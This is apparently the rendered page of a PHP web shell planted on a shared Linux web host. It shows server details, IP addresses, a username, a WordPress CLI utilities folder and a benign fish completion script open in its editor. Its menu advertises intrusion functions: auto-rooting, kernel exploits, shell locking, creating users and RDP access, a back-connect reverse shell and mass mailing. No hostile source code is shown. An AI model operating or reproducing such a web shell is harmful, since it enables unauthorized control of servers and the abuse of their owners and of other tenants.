Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
utils /
[ HOME SHELL ]
Name
Size
Permission
Action
amp-paths.txt
185
B
-rw-r--r--
auto-composer-update.sh
980
B
-rwxr-xr-x
find-php
348
B
-rwxr-xr-x
get-package-require-from-compo...
484
B
-rw-r--r--
install-requests.sh
793
B
-rwxr-xr-x
wp-completion.bash
495
B
-rw-r--r--
wp.fish
882
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp.fish
# Fish completion for the `wp` command # Check $fish_complete_path for possible install locations # Or check the documentation: # https://fishshell.com/docs/current/completions.html#where-to-put-completions function __wp_cli_complete # Get current buffer and cursor set --local COMP_LINE (commandline) set --local COMP_POINT (commandline -C) # Get valid completions from wp-cli set --local opts (wp cli completions --line=$COMP_LINE --point=$COMP_POINT) # wp-cli will indicate if it needs a file if string match -qe "<file> " -- $opts command ls -1 else # Remove unnecessary double spaces that wp-cli splits options with string trim -- $opts # `string` echoes each result on a newline. # Which is then collected for use with the `-a` flag for `complete`. end end complete -f -a "(__wp_cli_complete)" wp
Close